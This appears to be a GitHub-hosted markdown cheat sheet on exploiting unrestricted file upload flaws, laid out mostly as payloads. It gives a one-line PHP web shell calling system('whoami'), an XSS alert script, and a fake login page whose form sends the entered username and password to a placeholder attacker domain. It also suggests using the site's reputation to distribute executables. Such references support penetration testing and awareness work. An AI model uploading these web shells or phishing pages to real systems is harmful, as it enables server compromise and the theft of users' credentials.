Skip to content

Latest commit

 

History

History
49 lines (36 loc) · 1.4 KB

Unrestricted_File_Upload.md

File metadata and controls

49 lines (36 loc) · 1.4 KB

Unrestricted File Upload

Table of Contents

Upload a web shell

Arbitrary commands can be executed with the web service's execute privileges.1

  • Execute system commands 
     <?php system('whoami'); ?>

Upload a file with an HTML extension

Attacks such as XSS or phishing can be performed on trusted domains.

  • XSS

     <script>alert()</script>

  • Phishing

     <html>
 <title>Fake Login Page</title>
 <body>
     <h2>Login to Your Account</h2>
     <form action="http://[ATTACKER-DOMAIN]" method="POST">
         <input type="text" name="username" placeholder="Username" required>
         <input type="password" name="password" placeholder="Password" required>
         <input type="submit" value="Login">
     </form>
 </body>
 </html>

Distribute malicious files

Malicious files can be distributed by leveraging the domain's reputation.

  • exe, bat, dmg...

Footnotes

  1. It is possible only when files with the same extension as the language running on the service can be uploaded, and execute permissions are granted to the file.